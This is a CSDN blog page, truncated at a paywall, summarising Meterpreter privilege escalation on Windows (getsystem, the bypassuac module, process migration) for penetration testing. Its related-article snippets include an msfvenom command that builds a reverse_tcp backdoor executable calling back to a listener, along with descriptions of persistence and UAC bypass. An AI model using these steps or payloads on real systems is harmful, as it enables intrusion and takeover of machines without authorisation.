meterpreter提权小结

最新推荐文章于 2024-06-02 12:13:27 发布
最新推荐文章于 2024-06-02 12:13:27 发布
阅读量3k 收藏 11
点赞数 1
分类专栏: 网安 文章标签: meterpreter 提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40884727/article/details/100567586
版权
本文总结了在Meterpreter中进行提权的方法,包括getsystem自动提权(未能成功)、bypassuac提权(成功绕过UAC,获得系统权限)、migrate进程迁移(提升权限至可重启但无法新建账号)以及利用exploit/windows/local/ask模块弹窗提高程序运行级别。
摘要由CSDN通过智能技术生成

经过一波操作我们成功进入meterperter,接下来主要就如何在meterpreter进行提权在这里插入图片描述
首先我们可以输入getuid来查看当前用户的权限~
在这里插入图片描述
可以看到我们貌似可能是管理员权限,到底是不是还有待验证,我们的最终目的是将其提升到system权限.

getsystem自动提权

输入getsystem来尝试提权,MSF会自动选择合适的方式来提升当前权限
在这里插入图片描述
这个就比较玄学,我还没成功过,可以看到getsystem并不能生效

bypassuac提权

这里以exploit/windows/local/bypassuac为例进行示范:
在这里插入图片描述
当前的session为1,于是我们设置模块利用的session为1,并且run:
在这里插入图片描述
返回了一个新的meterpreter,再次输入

最低0.47元/天 解锁文章
MercyLin
关注
专栏目录
绕过云锁和腾讯管家提权.md.pdf
03-06
根据提供的文件信息,我们可以从中提取到许多IT安全领域的知识点,特别是与Web应用的提权和渗透测试相关的内容。以下是从标题、描述、标签以及部分文件内容中提炼出来的知识点: 1. **云锁和腾讯管家绕过技术**: ...
Meterpreter 提权
eli的博客
05-20 2300
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/meterpreter/reverse_tcp,反弹到的监听端地址为172.16.11.2,监听端口为44
12.1、后渗透测试--提权
无痕的博客
12-13 782
meterpreter后渗透阶段提权
利用meterperter进行win7系统提权
weixin_63137680的博客
10-30 1837
利用meterpreter对win7系统进行提权
Metapreter实现持续访问,自动化,提权--详细教程
qq_41245301的博客
01-05 676
1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同。EXE_NAME 生成后门文件的文件名称(非必要,用默认)REG_NAME 注册表设置的名称 (非必要,用默认)VBS_NAME VBS脚本的名称 (非必要,用默认)PATH 后门文件的存放路径 (非必要,用默认)SESSION 作用于那个会话。这里会自动执行文件中的命令。
Metasploit的提权和后渗透
Kali与编程
12-04 1583
后渗透技术包括提权、横向移动、持久化、数据窃取、漏洞利用等,攻击者可以利用这些技术和工具深入系统内部,并获取系统中的敏感信息、提高攻击者的权限、绕过防御措施等。在本文中,我将详细介绍Metasploit的提权模块和技术,包括Windows和Linux系统下的提权模块和技术,以及如何使用Metasploit进行提权攻击。横向移动是指攻击者在入侵一个系统后,通过利用系统内部的漏洞或者获取其他用户的登录名和密码等方式,从一个系统进入另一个系统,进而攻击其他系统。
提权工具大全
06-14
- **Windows提权工具**:如Meterpreter,Psexec,Nessus等,它们可以利用Windows系统的漏洞来提升权限。 - **Linux提权工具**:如LinEnum,John the Ripper,Privilege Escalation Scanner等,这些工具针对Linux...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
渗透测试框架提权
最新发布
2301_80361487的博客
06-02 789
getsystem是由Metasploit-Framework提供的一个模块,它可以将一个管理帐户(通常为本地Administrator账户)提升为本地SYSTEM帐户。UAC:用户帐户控制(User Account Control),是windows操作系统中采用的一种控制机制,它以预见的。1)getsystem创建一个新的Windows服务,设置为SYSTEM运行,当它启动时连接到一个命名管道。2)getsystem产生一个进程,它创建一个命名管道并等待来自该服务的连接。优点:省去手动查找的麻烦。
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 1403
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
Metasploit学习笔记(六)——Meterpreter后渗透之Hash攻击提权(包含Mimikatz)
Zichel77的博客
10-09 2781
针对WIN7,还是用永恒之蓝。
后渗透之meterpreter使用攻略
钻石
01-06 8472
本文转载来源:https://xz.aliyun.com/t/2536 Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。 0x01.系统命令 1)基本系统命令 sessions #sessions –h 查看帮助 sessi...
Linux 提权
qq_53742230的博客
07-17 2993
Linux 的一些常用提权手法
Metasploit权限提升全剧终
Fly_鹏程万里
07-06 5520
0×01 引言通常,我们在渗透过程中很有可能只获得了一个系统的Guest或User权限。低的权限级别将会使我们受到很多的限制,所以必须将访问权限从Guset提升到User,再到Administrator,最后到SYSTEM级别。渗透的最终目的是获取服务器的最高权限,即Windows操作系统中管理员账号的权限,或LINUX操作系统中root账户权限。提升权限的方式分为两类。纵向提权:低权限角色获得高...
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
Meterpreter提权详解
devil8123665的博客
12-06 1713
转载https://www.cnblogs.com/backlion/p/9484950.html 0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.11.2 lport=4444 -f exe -o /tmp/hack.exe 这里我们为生成的木马指定了payload为: windows/me
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 9484
MeterpreterMetasploit 框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
meterpreter提权
07-27
meterpreter提权是指在使用meterpreter反弹到目标主机后,通过一系列操作提升当前用户的权限。根据引用\[3\]所述,当用户不在管理员组时,通常可以通过系统的溢出漏洞进行提权。而当所得用户权限在管理员组时,需要先绕过UAC(用户账户控制),然后使用meterpreter的getsystem命令进行提权。具体的操作步骤可能因不同的情况而有所不同,但一般的思路是先获取当前用户的权限信息,然后根据情况选择合适的提权方法。 #### 引用[.reference_title] - *1* *2* [Meterpreter提权详解](https://blog.csdn.net/devil8123665/article/details/110769560)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [meterpreter之getsystem命令提权详解](https://blog.csdn.net/redwand/article/details/107527710)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值